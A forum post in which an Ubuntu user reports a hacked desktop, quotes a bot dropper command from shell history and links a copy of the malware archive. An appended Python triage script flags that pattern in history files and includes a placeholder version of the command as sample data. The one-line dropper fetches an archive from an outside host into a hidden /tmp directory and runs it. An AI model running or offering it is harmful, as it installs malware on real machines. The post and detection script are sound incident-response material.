Hi.
I am totally amazed at how my lounge ubuntu 10.04 desktop got hacked. Pressing the up arrow one single time in xterm got me the following:
Code:
cd /tmp;mkdir .,.;cd .,.;wget http://mikutzul.100free.com/LiDaFrMECH.tar;tar xvf LiDaFrMECH.tar;rm -rf LiDaFrMECH.tar;cd .em;chmod +x *;./start kit;exit
For those interested: I have put the file on my ftp at http:// ci2.ca / files / LiDaFRMECH.tar (see that I have put spaces in the link for it not to be too easily clickable). Downloading it on a Windows system, Avast reported it as an ELF_RST.B type attack.
Can anyone help me identify what this bot is and how it could have gotten installed into my "me only access" computer? It's not even going on the net. It's plugged into my home network, but the fixed IP on it has no port forwarded from the router. What troubles me is that this is the very last command run after the last time I logged into the shell of this system some few hours ago.
Here is the list of things I did in this system:
- installed ubuntu 10.04 on a fresh new system
- updated ubuntu
- installed xbmc and filezilla (to only ftp enormous files from my dedicated server to my home only...)
- installed freenx (terminal client citrix like) as per ubuntu's procedure
And all these were done a long while ago. This system has run for weeks now. Except freenx that is recent.
I have identified that this is a bot. Killed the process numerous times... Removed the hidden folder in tmp and rebooted. I don't really know if this did the trick.
Can anyone help me identify what this is and where to look in order to "clean" my system?
Best regards.
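
Added example, not part of the original post: a small Python triage script that scans shell history for the shape of command quoted above (work in a temp directory, create a hidden directory, fetch an archive, unpack it, mark files executable, run a local file). The function names, trait labels and sample history are constructed for illustration, and the host in the sample is a placeholder.

```python
import re
import sys

FETCH = {"wget", "curl", "tftp", "lwp-download"}
UNPACK = {"tar", "unzip", "gunzip"}
TEMP_DIRS = {"/tmp", "/var/tmp", "/dev/shm"}

# Constructed sample history; entry 3 mirrors the structure of the command in the post.
SAMPLE_HISTORY = [
    "sudo apt-get update && sudo apt-get upgrade",
    "wget http://releases.example.invalid/xbmc.tar; tar xvf xbmc.tar",
    "cd /tmp;mkdir .,.;cd .,.;wget http://host.example.invalid/kit.tar;tar xvf kit.tar;"
    "rm -rf kit.tar;cd .em;chmod +x *;./start kit;exit",
    "cd ~/src && ./configure && make",
]

def makes_executable(mode):
    """True for chmod modes that set an execute bit (e.g. +x, a+rx, 755)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return int(mode[-3]) % 2 == 1  # owner execute bit
    return re.fullmatch(r"[ugoa]*\+[rwxXst]*x[rwxXst]*", mode) is not None

def traits(line):
    """Ordered, de-duplicated dropper traits found in one history line."""
    found = []
    for step in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line.strip()):
        words = step.split()
        if not words:
            continue
        cmd, names = words[0], [a for a in words[1:] if not a.startswith("-")]
        if cmd == "cd" and names and names[0].rstrip("/") in TEMP_DIRS:
            tag = "temp-dir"
        elif cmd == "mkdir" and any(n.rsplit("/", 1)[-1].startswith(".") for n in names):
            tag = "hidden-dir"
        elif cmd in FETCH:
            tag = "fetch"
        elif cmd in UNPACK:
            tag = "unpack"
        elif cmd == "chmod" and names and makes_executable(names[0]):
            tag = "chmod-exec"
        elif cmd.startswith("./"):
            tag = "local-exec"
        else:
            continue
        if tag not in found:
            found.append(tag)
    return found

def scan(lines):
    """Return (line_number, traits) for lines that fetch a file and later run a local one."""
    hits = [(n, traits(l)) for n, l in enumerate(lines, 1)]
    return [(n, t) for n, t in hits if "fetch" in t and "local-exec" in t
            and t.index("fetch") < t.index("local-exec")]

if __name__ == "__main__":
    src = open(sys.argv[1], errors="replace").read().splitlines() if len(sys.argv) > 1 else SAMPLE_HISTORY
    for n, t in scan(src):
        print(f"line {n}: {', '.join(t)}")
```

Pass a history file such as `~/.bash_history` as the first argument to scan it instead of the sample. Shell history is easy to edit or bypass, so an empty result says nothing about whether the system is clean.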